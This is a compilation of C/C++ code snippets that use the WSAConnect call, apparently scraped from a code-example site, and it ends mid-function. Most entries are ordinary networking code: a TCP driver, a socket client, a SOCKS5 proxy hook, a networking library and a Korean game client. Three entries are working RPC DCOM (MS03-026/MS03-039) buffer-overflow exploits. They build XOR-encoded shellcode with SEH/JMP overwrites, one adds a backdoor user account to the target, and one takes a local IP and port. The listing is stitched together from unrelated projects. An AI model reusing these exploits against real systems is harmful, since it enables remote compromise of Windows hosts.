//     fp=fopen("shellcode","rb");
//     fread(rawData,1,1036,fp);
//     fclose(fp);
    //теперь нужно ссчит ть непосредственно исполняемый шеллкод!

    fp=fopen("bshell2","rb");
    int sz=fread(shellcode,1,1024,fp);
    fclose(fp);
//     printf("%d\n",sz);
    for(int i=0; i<sz; i++)
        rawData[i+0x71]=shellcode;
//     fp=fopen("badfile.exe","rb");
//     unsigned int sz1=fread(shellcode,1,50000,fp);
//     fclose(fp);
//     for(i=0;i<sz1;i++)
//          rawData[i+0x240]=shellcode;

//     fp=fopen("pac","wb");
//     fwrite(rawData,1,1036,fp);
//     fclose(fp);

//     return;


    //Перед тем к к ксорить з пишем  дрес свободного HEAP'a
//     DWORD heap=0x00180000;
//     int k=vers;
//     vers=1;
//     *(DWORD *)(rawData+0xae)=target_os[vers].heap;
    *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap;
    //.еперь нужно проксорить н ш код, для того чтобы получить нужный н м
    XOR(rawData,0x71,sz,0x99);
//     XOR(rawData,0x240,sz1,0x99);
    //. к же н м нужно з пис ть нужный н м SEH и JMP
    DWORD seh=target_os[vers].seh;
    DWORD jmp=target_os[vers].jmp;
    *(DWORD *)(rawData+0x22a)=jmp;
    *(DWORD *)(rawData+0x22e)=seh;
//     *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz));
    *(WORD *)(rawData+0x62)=sz;


    memcpy(buf2,request1,sizeof(request1));
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);

    memcpy(buf2+len1,rawData,sizeof(rawData));
    len1=len1+sizeof(rawData);

    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;

    closesocket(sock);
    if(atack)
    {
        sock=socket(2,1,0);
        WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL);

        if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
        {
            printf("%s - send failed %d\n",ip,WSAGetLastError());
            return 0;
        }
        else {
            printf("%s - send exploit to %s\n",ip,target_os[vers].target);
        }

        len=recv(sock,(char *)buf1,1000,NULL);
        bool ft=1;
        if(ft)
        {
            int i=0;
            while(1)
            {
                if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR)
                {
                    printf("\nSend failed.Error:%d\n",WSAGetLastError());
                    return 0;
                }
                else
                {
                    printf("\r%d",++i);
                }
                //Sleep(1000);
            }
        }
        send(sock,(const char *)buf2,len1,0);
        closesocket(sock);
    }
    else fprintf(fp1,"%s %s\n",target_os[vers].target,ip);
//     fp=fopen("pac","wb");
//     fwrite(rawData,1,1036,fp);
//     fclose(fp);
}
Пример #15
0
DWORD WINAPI CEgTcpDriver::Connect(const SOCKADDR_IN & Server)
{
	if (!m_bInited)
		return 0;//0 is needed for Transport

	SOCKET Sock = CreateSocket();

	if (Sock == INVALID_SOCKET)
		return WSAGetLastError();

    int iRes = WSAEventSelect(Sock, m_hWsaEvents[WSAEVENTSELECT_EVENT], FD_CONNECT);
	if (iRes == SOCKET_ERROR )
	{
		DWORD dwErr = WSAGetLastError();
		closesocket(Sock);
		return dwErr;
	}

	PER_SOCKET_CONTEXT	ConnectContext;
	
	ConnectContext.m_ConnectioID.m_Socket = Sock;	
	ConnectContext.m_pIOContext.m_IoOperation = ClientIoRead;
	ConnectContext.m_ConnectioID.m_RemoteAddr = Server;

	m_SocketContextsLock.Lock();
	
	pair<set<PER_SOCKET_CONTEXT>::iterator, bool> InsIt;
	
	while(true)
	{
		InsIt = m_SocketContexts.insert(ConnectContext);
		if (InsIt.second == true)
			break;
		
		SwitchToThread();
	}

	PER_SOCKET_CONTEXT & SocketContext = *(InsIt.first);

	// ConnectEx lives on XP only ;((
    int iRet = WSAConnect(SocketContext.m_ConnectioID.m_Socket, 
        (LPSOCKADDR)&Server, sizeof(Server), 
        NULL, NULL, NULL, NULL);

	DWORD dwErr = 0;
    if (SOCKET_ERROR == iRet && (WSAEWOULDBLOCK != WSAGetLastError()))
    {
        dwErr = WSAGetLastError();

		if (dwErr == WSAECONNREFUSED) // Microsoft "feature"
		{
			WSANETWORKEVENTS NetworkEvents;
			int iRes = WSAEnumNetworkEvents(Sock, m_hWsaEvents[WSAEVENTSELECT_EVENT], &NetworkEvents);

			if (FD_CONNECT & NetworkEvents.lNetworkEvents)
			{
				CloseClient(SocketContext, CONNECTION_CANT_ESTABLISH);	
			}
		}
		else
			CloseClient(SocketContext, CONNECTION_CANT_ESTABLISH);	
	}

	m_SocketContextsLock.Unlock();

	return dwErr;
}
Пример #16
0
// TODO: To act as construct.
bool 
libsockclient_init(char *Host, int Port) 
{
	WSADATA wsaData;
	struct hostent *pServer;
	struct sockaddr_in pServerAddr;
	int err;

	// TODO: To initial use of WS2_32.DLL by a process.
	err = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (err != 0) 
	{
#if DEBUG
		printf("DEBUG at %d: WSAStartup error.\n", __LINE__);
#endif
		m_ErrorCode = WSAGetLastError();
		return false;
	}

	// TODO: To create a socket that is bound to a specific transport service 
    // provider, and optionally creates and/or joins a socket group.
	m_SocketHandler = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 
        WSA_FLAG_OVERLAPPED);
	if (m_SocketHandler == INVALID_SOCKET) 
	{
#if DEBUG
		printf("DEBUG at %d: WSASocket error.\n", __LINE__);
#endif
		m_ErrorCode = WSAGetLastError();
		return false;
	}

	// TODO: To retrieve host information corresponding to a host name from a 
    // host database.
	pServer = gethostbyname(Host);
	if (pServer == NULL) 
	{
#if DEBUG
		printf("DEBUG at %d: gethostbyname error.\n", __LINE__);
#endif
		m_ErrorCode = WSAGetLastError();
		libsockclient_cleanup();
		return false;
	}

	// TODO: To establishe a connection to another socket application, exchanges 
    // connect data, and specifies needed quality of service based on the supplied 
    // FLOWSPEC structure.
	ZeroMemory((char *)&pServerAddr, sizeof(pServerAddr));
	pServerAddr.sin_family = AF_INET;
	pServerAddr.sin_port = htons(Port);
	CopyMemory((char *)&pServerAddr.sin_addr.s_addr, (char *)pServer->h_addr, 
		pServer->h_length);
	if (SOCKET_ERROR == WSAConnect(m_SocketHandler, 
		reinterpret_cast<const struct sockaddr *>(&pServerAddr), sizeof(pServerAddr), 
		NULL, NULL, NULL, NULL)) 
	{
#if DEBUG
		printf("DEBUG at %d: WSAConnect error.\n", __LINE__);
#endif
		libsockclient_cleanup();
		m_ErrorCode = WSAGetLastError();
		return false;
	}

	m_Host = Host;
	m_Port = Port;
	return true;
}
Пример #17
0
DWORD	tcp_connect(
						char *host, 

						WORD port)
{	
	DWORD	SockFD = 0;

	DWORD	nb_io = 1;

	DWORD	option = 0;

	struct	linger lin;

	struct	sockaddr_in DstSAin;

	BOOL	disable_nagle;

	
	DstSAin.sin_family = AF_INET;

	DstSAin.sin_port = htons(port);

	DstSAin.sin_addr.s_addr= inet_addr(host);	

	if((SockFD = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET)
	{

		if(NETIO_DEBUG)
		fprintf(stderr,

			"[%08X] Error: Unable to allocate socket\n"

		,WSAGetLastError());
	
		return(-1);
	}

	if((WSAConnect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin),NULL,NULL,NULL,NULL)) == SOCKET_ERROR)
	{
		if(NETIO_DEBUG)
		fprintf(stderr,

			"[%08X] Error: Unable to connect to %s:%d\n"
		
		,WSAGetLastError(),host,port);

		closesocket(SockFD);
	
		return(-1);
	}

	if((ioctlsocket(SockFD,FIONBIO,&nb_io)) == SOCKET_ERROR)
	{
		if(NETIO_DEBUG)
		fprintf(stderr,
			
			"[%08X] Error: Unable to set IO mode of socket %d\n"
		
		,WSAGetLastError(),SockFD);
	
		closesocket(SockFD);

		return(-1);
	}

	lin.l_onoff = 1;

	lin.l_linger = 0;

	if((setsockopt(SockFD,SOL_SOCKET,SO_LINGER,(const char *)&lin,sizeof(lin))) == SOCKET_ERROR)
	{
		if(NETIO_DEBUG)
		fprintf(stderr,
			
			"[%08X] Error: Unable to set socket option SO_LINGER on socket %d\n"
		
		,WSAGetLastError(),SockFD);
		
		closesocket(SockFD);

		return(-1);
	}

	disable_nagle = TRUE;
		
	if((setsockopt(SockFD,IPPROTO_TCP,TCP_NODELAY,(const char *)&disable_nagle,sizeof(disable_nagle))) == SOCKET_ERROR)
	{
		if(NETIO_DEBUG)
		fprintf(stderr,
			
			"[%08X] Error: Unable to set socket option TCP_NODELAY on socket %d\n"
		
		,WSAGetLastError(),SockFD);
		
		closesocket(SockFD);
		
		return(-1);
	}

	return(SockFD);
}
Пример #18
0
void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
	int	i, iType;

	printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
			"Base on flashsky's MS03-026 exp\n"
			"Code by ey4s<eyas#xfocus.org>\n"
			"2003-09-16\n"
			"Welcome to http://www.xfocus.net\n"
			"Thanks to flashsky & benjurry & Dave Aitel\n"
			"If success, target will add a user \"e\" and password is \"asd#321\"\n\n");

	if(argc!=3)
	{
		printf("Usage: %s <target> <type>\n", argv[0]);
		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
			printf( "<%d>   %s\n"
					"      TopSeh=0x%.8x in %s\n"
					"      JmpAddr=0x%.8x in %s\n",
					i, targets[i].os,
					targets[i].dwTopSeh, targets[i].seh,
					targets[i].dwJmpAddr, targets[i].jmp);
		return;
	}

	iType = atoi(argv[2]);
	if((iType<0) || iType > sizeof(targets)/sizeof(v))
	{
		printf("[-] Wrong type.\n");
		return;
	}

	memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
	memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
	memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
	printf("[+] Prepare shellcode completed.\n");

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
	printf("[+] Connect to %s:135 success.\n", argv[1]);

	if(sizeof(sc_add_user) > sc_max)
	{
		printf("[-] shellcode too long, exit.\n");
		return;
	}

 
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  //计算文件名双字节长度
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//计算文件名双字节长度
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
    //计算各种结构的长度
    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

    len = send(sock,bindstr,sizeof(bindstr),0);
	if(len<=0)
    {
            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
 	else
		printf("[+] send %d bytes.\n", len);
	
    len=recv(sock,buf1,1000,0);
	if(len<=0)
	{
		printf("[-] recv error:%d\n", GetLastError());
		return;
	}
	else
		printf("[+] recv %d bytes.\n", len);

    len = send(sock,buf2,len1,0);
	if(len<=0)
    {
            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
	else
		printf("[+] send %d bytes.\n", len);
    len=recv(sock,buf1,1024,0);
	if(len<=0)
	{
		printf("[+] Target crash or exploit success? :)\n");
	}
	else
		printf("[-] recv %d bytes. Bad luck!\n", len);
}
Пример #19
0
int WINAPI new_WSAConnect(SOCKET s,
			  const struct sockaddr *name,
			  int namelen,
			  LPWSABUF lpCallerData,
			  LPWSABUF lpCalleeData,
			  LPQOS lpSQOS, LPQOS lpGQOS) {
    int rc, err;
    struct sockaddr_in in_addr;
    struct sockaddr_in out_addr;
    char buf[256];
    fd_set set;

    DEBUG_ENTER;

    memcpy(&in_addr, name, sizeof(in_addr));

    /* change non-local */
    if (in_addr.sin_addr.s_addr != inet_addr("127.0.0.1")) {
	DEBUG;
	out_addr.sin_family = AF_INET;
	out_addr.sin_port = htons(1080);
	out_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    }

    DEBUG;

    /* connect */
    _unhook(2);
    rc = WSAConnect(s, (struct sockaddr *) (&out_addr),
		    sizeof(struct sockaddr_in), lpCallerData,
		    lpCalleeData, lpSQOS, lpGQOS);
    err = WSAGetLastError();
#if defined(_DEBUG) || defined(_DEBUG_)
    TRACE_NO("connect (rc:%i err:%i pid:%i): %s\n", rc, err,
	     GetCurrentProcessId(), socketError());
#endif
    _hook(2);
    if (rc != 0 && err != WSAEWOULDBLOCK) {
	closesocket(s);
	DEBUG_LEAVE;
	return rc;
    }

    /* pass through local */
    if (in_addr.sin_addr.s_addr == inet_addr("127.0.0.1")) {
	DEBUG_LEAVE;
	return rc;
    }

    /* fd_set */
    FD_ZERO(&set);
    FD_SET(s, &set);
    /* sock5 handshake */
    select(s + 1, NULL, &set, NULL, 0);
    rc = send(s, "\x05\x01\x00", 3, 0);
#if defined(_DEBUG) || defined(_DEBUG_)
    TRACE_VERBOSE("send (rc:%i err:%i pid:%i): %s\n", rc,
		  WSAGetLastError(), GetCurrentProcessId(), socketError());
#endif
    if (rc != 3) {
	closesocket(s);
	DEBUG_LEAVE;
	return SOCKET_ERROR;
    }

    /* socks5 ack */
    select(s + 1, &set, NULL, NULL, 0);
    rc = recv(s, buf, 256, 0);
#if defined(_DEBUG) || defined(_DEBUG_)
    TRACE_VERBOSE("recv (rc:%i err:%i pid:%i): %s\n", rc,
		  WSAGetLastError(), GetCurrentProcessId(), socketError());
    DUMP(buf, rc);
#endif
    if (rc != 2) {
	closesocket(s);
	DEBUG_LEAVE;
	return SOCKET_ERROR;
    }

    /* socks5 request */
    memcpy(buf, "\x05\x01\x00\x01", 4);
    memcpy(buf + 4, &in_addr.sin_addr.s_addr, 4);
    memcpy(buf + 8, &in_addr.sin_port, 2);
    select(s + 1, NULL, &set, NULL, 0);
    rc = send(s, buf, 10, 0);
#if defined(_DEBUG) || defined(_DEBUG_)
    TRACE_VERBOSE("send (rc:%i err:%i pid:%i): %s\n", rc,
		  WSAGetLastError(), GetCurrentProcessId(), socketError());
#endif
    if (rc != 10) {
	closesocket(s);
	DEBUG_LEAVE;
	return SOCKET_ERROR;
    }

    /* socks5 ack */
    select(s + 1, &set, NULL, NULL, 0);
    rc = recv(s, buf, 256, 0);
#if defined(_DEBUG) || defined(_DEBUG_)
    TRACE_VERBOSE("recv (rc:%i err:%i pid:%i): %s\n", rc,
		  WSAGetLastError(), GetCurrentProcessId(), socketError());
    DUMP(buf, rc);
#endif
    if (rc != 10) {
	closesocket(s);
	DEBUG_LEAVE;
	return SOCKET_ERROR;
    }

    DEBUG_LEAVE;
    return 0;
}
Пример #20
0
Socket *Network::ConnectSocket(const char *address, unsigned short port, SocketTransportLayer transport)
{
	addrinfo *result = NULL;
	addrinfo *ptr = NULL;
	addrinfo hints;
	memset(&hints, 0, sizeof(hints));
	hints.ai_family = AF_INET;
	hints.ai_socktype = (transport == SocketOverTCP) ? SOCK_STREAM : SOCK_DGRAM;
	hints.ai_protocol = (transport == SocketOverTCP) ? IPPROTO_TCP : IPPROTO_UDP;

	char strPort[256];
	sprintf(strPort, "%d", (unsigned int)port);
	int ret = getaddrinfo(address, strPort, &hints, &result);
	if (ret != 0)
	{
		LOG(LogError, "Network::Connect: getaddrinfo failed: %s", GetErrorString(ret).c_str());
		return 0;
	}

#ifdef WIN32
	SOCKET connectSocket = WSASocket(result->ai_family, result->ai_socktype, result->ai_protocol,
		NULL, 0, WSA_FLAG_OVERLAPPED);
#else
	SOCKET connectSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
	LOG(LogInfo, "A call to socket() returned a new socket 0x%8X.", (unsigned int)connectSocket);
#endif
	if (connectSocket == INVALID_SOCKET)
	{
		LOG(LogError, "Network::Connect: Error at socket(): %s", GetLastErrorString().c_str());
		freeaddrinfo(result);
		return 0;
	}

	// Connect to server.
#ifdef WIN32
	ret = WSAConnect(connectSocket, result->ai_addr, (int)result->ai_addrlen, 0, 0, 0, 0);
#else
	ret = connect(connectSocket, result->ai_addr, (int)result->ai_addrlen);
#endif

	if (ret == KNET_SOCKET_ERROR)
	{
		closesocket(connectSocket);
		connectSocket = INVALID_SOCKET;
	}

	freeaddrinfo(result);

	if (connectSocket == INVALID_SOCKET)
	{
		LOG(LogError, "Unable to connect to server!");
		return 0;
	}

	EndPoint localEndPoint;
	sockaddr_in sockname;
	socklen_t socknamelen = sizeof(sockname);
	ret = getsockname(connectSocket, (sockaddr*)&sockname, &socknamelen);
	if (ret == 0)
		 localEndPoint = EndPoint::FromSockAddrIn(sockname);
	else
		LOG(LogError, "Network::ConnectSocket: getsockname failed: %s!", Network::GetLastErrorString().c_str());

	EndPoint remoteEndPoint;
	sockaddr_in peername;
	socklen_t peernamelen = sizeof(peername);
	ret = getpeername(connectSocket, (sockaddr*)&peername, &peernamelen);
	if (ret == 0)
		remoteEndPoint = EndPoint::FromSockAddrIn(peername);
	else
		LOG(LogError, "Network::ConnectSocket: getpeername failed: %s!", Network::GetLastErrorString().c_str());

	std::string remoteHostName = remoteEndPoint.IPToString();

	const size_t maxSendSize = (transport == SocketOverTCP) ? cMaxTCPSendSize : cMaxUDPSendSize;
	Socket socket(connectSocket, localEndPoint, localHostName.c_str(), remoteEndPoint, remoteHostName.c_str(), transport, ClientSocket, maxSendSize);

	socket.SetBlocking(false);
	sockets.push_back(socket);

	Socket *sock = &sockets.back();

	return sock;
}
Пример #21
0
LRESULT CALLBACK WndProc(HWND hWnd, UINT iMessage, WPARAM wParam, LPARAM lParam)
{
	HDC hdc;
	static BOOL bnowDraw = FALSE;
	int retval;
	PAINTSTRUCT ps;
	//static point line;
	static HANDLE hTimer;
	
	HBRUSH MyBrush, OldBrush;
	HPEN Mypen, Oldpen;

	static int CH_x, CH_y;			//케릭터 좌표
	static int direction;
	static int num;					//배게 번호

	static bool pillow[5];			//배게 5개 랜덤 등장
	static bool have_pillow;

	static int hori;				// x축		0-> 초기 1-> + 2-> -
	static int verti;				// y축

	static bool shoot;				// 총알(한번에 열개 까지)
										// 서버에서는 쏘았다는 신호만 보내 줄 것
	static int shootCount;
	static int pillow_x[5], pillow_y[5];	//배게의 위치

	switch (iMessage) {
	case WM_CREATE:

		// 윈속 초기화
		WSADATA wsa;
		if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
			return 1;

		// socket()
		Mysock =WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
		if (Mysock == INVALID_SOCKET) err_quit("socket()");

		// connect()
		SOCKADDR_IN serveraddr;
		ZeroMemory(&serveraddr, sizeof(serveraddr));
		serveraddr.sin_family = AF_INET;
		serveraddr.sin_addr.s_addr = inet_addr(SERVERIP);
		serveraddr.sin_port = htons(SERVERPORT);
		retval = WSAConnect(Mysock, (sockaddr *)&serveraddr, sizeof(serveraddr),
			NULL, NULL, NULL, NULL);
		if (retval == SOCKET_ERROR) err_quit("connect()");

		WSAAsyncSelect(Mysock, hWnd, WM_SOCKET, FD_CLOSE | FD_READ);

		sendWSA.buf = send_buf;
		sendWSA.len = BUFSIZE;
		recvWSA.buf = recv_buf;
		recvWSA.len = BUFSIZE;

		// 데이터 통신에 사용할 변수
		char buf[BUFSIZE + 1];
		int len;
		return 0;
		hori = 0;
		verti = 0;
		shootCount = 0;
		shoot = false;

		//hTimer = (HANDLE)SetTimer(hWnd, 1, 30, NULL);

		return 0;

	case WM_KEYDOWN:{
		
		if (GameStart){
			//CS_ShootKey *shootkey = reinterpret_cast<CS_ShootKey*>(send_buf);
			CS_key *key = reinterpret_cast<CS_key*> (send_buf);
			if (wParam == VK_RIGHT){
				hori = 1;
				verti = 0;
			}
			if (wParam == VK_LEFT){
				hori = 2;
				verti = 0;
			}
			if (wParam == VK_UP){
				verti = 1;
				hori = 0;
			}
			if (wParam == VK_DOWN){
				verti = 2;
				hori = 0;
			}/*if (wParam == VK_SPACE){
				shoot = true;
			}*/
			key->type = CS_KEY;
			key->size = sizeof(CS_key);
			sendWSA.len = sizeof(CS_key);

			int ret;
			DWORD iobyte;
			if (0 != hori){
				if (1 == hori) {
					key->movetype = KEY_RIGHT;
					key->direction = 1;
				}
				else{
					key->movetype = KEY_LEFT;
					key->direction = 2;
				}
			}
			if (0 != verti){
				if (1 == verti) {
					key->movetype = KEY_UP;
					key->direction = 3;
				}
				else {
					key->movetype = KEY_DOWN;
					key->direction = 4;
				}
			}
			ret = WSASend(Mysock, &sendWSA, 1, &iobyte, 0, NULL, NULL);
			if (ret){
				int error_code = WSAGetLastError();
				printf("Error while sending packet[%d]", error_code);
			}


			//InvalidateRect(hWnd, NULL, TRUE);
		}
	}
		return 0;

	case WM_KEYUP:
		shoot = false;
		return 0;

	case WM_PAINT:
		hdc = BeginPaint(hWnd, &ps);
		//게임 공간
		Rectangle(hdc, 20, 20, 400, 400);

		//임시 케릭터
		if (Mych){
			MyBrush = CreateHatchBrush(HS_BDIAGONAL, RGB(255, 0, 0));
			OldBrush = (HBRUSH)SelectObject(hdc, MyBrush);
			Mypen = CreatePen(PS_SOLID, 1, RGB(255, 0, 0));
			Oldpen = (HPEN)SelectObject(hdc, Mypen);
			Ellipse(hdc, pl.x, pl.y, pl.x + 20, pl.y + 20);		//캐릭터 본체(원형)
			
			//if (direction == 1){								//방향 삼각형(오른쪽)
			//	MoveToEx(hdc, pl.x + 20, pl.y, NULL);
			//	LineTo(hdc, pl.x + 20, pl.y + 20);
			//	MoveToEx(hdc, pl.x + 20, pl.y + 20, NULL);
			//	LineTo(hdc, pl.x + 30, pl.y + 10);
			//	MoveToEx(hdc, pl.x + 30, pl.y + 10, NULL);
			//	LineTo(hdc, pl.x + 20, pl.y);
			//}if (direction == 2){								//방향 삼각형(왼쪽)
			//	MoveToEx(hdc, pl.x, pl.y, NULL);
			//	LineTo(hdc, pl.x, pl.y + 20);
			//	MoveToEx(hdc, pl.x, pl.y + 20, NULL);
			//	LineTo(hdc, pl.x - 10, pl.y + 10);
			//	MoveToEx(hdc, pl.x - 10, pl.y + 10, NULL);
			//	LineTo(hdc, pl.x, pl.y);
			//}if (direction == 3){								//방향 삼각형(위)
			//	MoveToEx(hdc, pl.x, pl.y, NULL);
			//	LineTo(hdc, pl.x + 20, pl.y);
			//	MoveToEx(hdc, pl.x + 20, pl.y, NULL);
			//	LineTo(hdc, pl.x + 10, pl.y - 10);
			//	MoveToEx(hdc, pl.x + 10, pl.y - 10, NULL);
			//	LineTo(hdc, pl.x, pl.y);
			//}if (direction == 4){								//방향 삼각형(아래)
			//	MoveToEx(hdc, pl.x, pl.y + 20, NULL);
			//	LineTo(hdc, pl.x + 20, pl.y + 20);
			//	MoveToEx(hdc, pl.x + 20, pl.y + 20, NULL);
			//	LineTo(hdc, pl.x + 10, pl.y + 30);
			//	MoveToEx(hdc, pl.x + 10, pl.y + 30, NULL);
			//	LineTo(hdc, pl.x, pl.y + 20);
			//}
			SelectObject(hdc, OldBrush);
			SelectObject(hdc, Oldpen);
			DeleteObject(MyBrush);
			DeleteObject(Mypen);
		}
		for (int i = 0; i <  8; ++i){
			if (Enemych[i]){	// 타 플레이어

				MyBrush = CreateHatchBrush(HS_BDIAGONAL, RGB(0, 0, 0));
				OldBrush = (HBRUSH)SelectObject(hdc, MyBrush);
				Mypen = CreatePen(PS_SOLID, 1, RGB(0, 0, 0));
				Oldpen = (HPEN)SelectObject(hdc, Mypen);
				Ellipse(hdc, enemy[i].x, enemy[i].y, enemy[i].x + 20, enemy[i].y + 20);		//캐릭터 본체(원형)

				//if (direction == 1){								//방향 삼각형(오른쪽)
				//	MoveToEx(hdc, enemy[i].x + 20, enemy[i].y, NULL);
				//	LineTo(hdc, enemy[i].x + 20, enemy[i].y + 20);
				//	MoveToEx(hdc, enemy[i].x + 20, enemy[i].y + 20, NULL);
				//	LineTo(hdc, enemy[i].x + 30, enemy[i].y + 10);
				//	MoveToEx(hdc, enemy[i].x + 30, enemy[i].y + 10, NULL);
				//	LineTo(hdc, enemy[i].x + 20, enemy[i].y);
				//}if (direction == 2){								//방향 삼각형(왼쪽)
				//	MoveToEx(hdc, enemy[i].x, enemy[i].y, NULL);
				//	LineTo(hdc, enemy[i].x, enemy[i].y + 20);
				//	MoveToEx(hdc, enemy[i].x, enemy[i].y + 20, NULL);
				//	LineTo(hdc, enemy[i].x - 10, enemy[i].y + 10);
				//	MoveToEx(hdc, enemy[i].x - 10, enemy[i].y + 10, NULL);
				//	LineTo(hdc, enemy[i].x, enemy[i].y);
				//}if (direction == 3){								//방향 삼각형(위)
				//	MoveToEx(hdc, enemy[i].x, enemy[i].y, NULL);
				//	LineTo(hdc, enemy[i].x + 20, enemy[i].y);
				//	MoveToEx(hdc, enemy[i].x + 20, enemy[i].y, NULL);
				//	LineTo(hdc, enemy[i].x + 10, enemy[i].y - 10);
				//	MoveToEx(hdc, enemy[i].x + 10, enemy[i].y - 10, NULL);
				//	LineTo(hdc, enemy[i].x, enemy[i].y);
				//}if (direction == 4){								//방향 삼각형(아래)
				//	MoveToEx(hdc, enemy[i].x, enemy[i].y + 20, NULL);
				//	LineTo(hdc, enemy[i].x + 20, enemy[i].y + 20);
				//	MoveToEx(hdc, enemy[i].x + 20, enemy[i].y + 20, NULL);
				//	LineTo(hdc, enemy[i].x + 10, enemy[i].y + 30);
				//	MoveToEx(hdc, enemy[i].x + 10, enemy[i].y + 30, NULL);
				//	LineTo(hdc, enemy[i].x, enemy[i].y + 20);
				//}			
				
				SelectObject(hdc, OldBrush);
				SelectObject(hdc, Oldpen);
				DeleteObject(MyBrush);
				DeleteObject(Mypen);

			}
		}
		EndPaint(hWnd, &ps);
		return 0;

	case WM_SOCKET:
		if (WSAGETSELECTERROR(lParam)){
			closesocket((SOCKET)wParam);
			exit(-1);
			break;
		}
		switch (WSAGETSELECTEVENT(lParam)){
		case FD_READ:
			ReadPacket((SOCKET)wParam);
			break;
		case FD_CLOSE:
			closesocket((SOCKET)wParam);
			exit(-1);
			break;
		}
	default:break;
	

	case WM_DESTROY:
		//KillTimer(hWnd, 1);A
		PostQuitMessage(0);

		return 0;	
	
		}

	return(DefWindowProc(hWnd, iMessage, wParam, lParam));
}
Пример #22
0
void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;
    DWORD cb;

    printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
    printf("Code by FlashSky,[email protected],benjurry,[email protected]\n");
    printf("Welcome to our English Site: http://www.xfocus.org\n");
    printf("Welcome to our Chinese Site: http://www.xfocus.net\n");


if(argc<5)
{
  printf("useage:%s targetip localIP LocalPort SPVersion\n",argv[0]);
   printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese version +SP4\n 2 winxp English version +sp1\n");
exit(1);
}

if(atoi(argv[4])==0)
memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
else if (atoi(argv[4])==1)
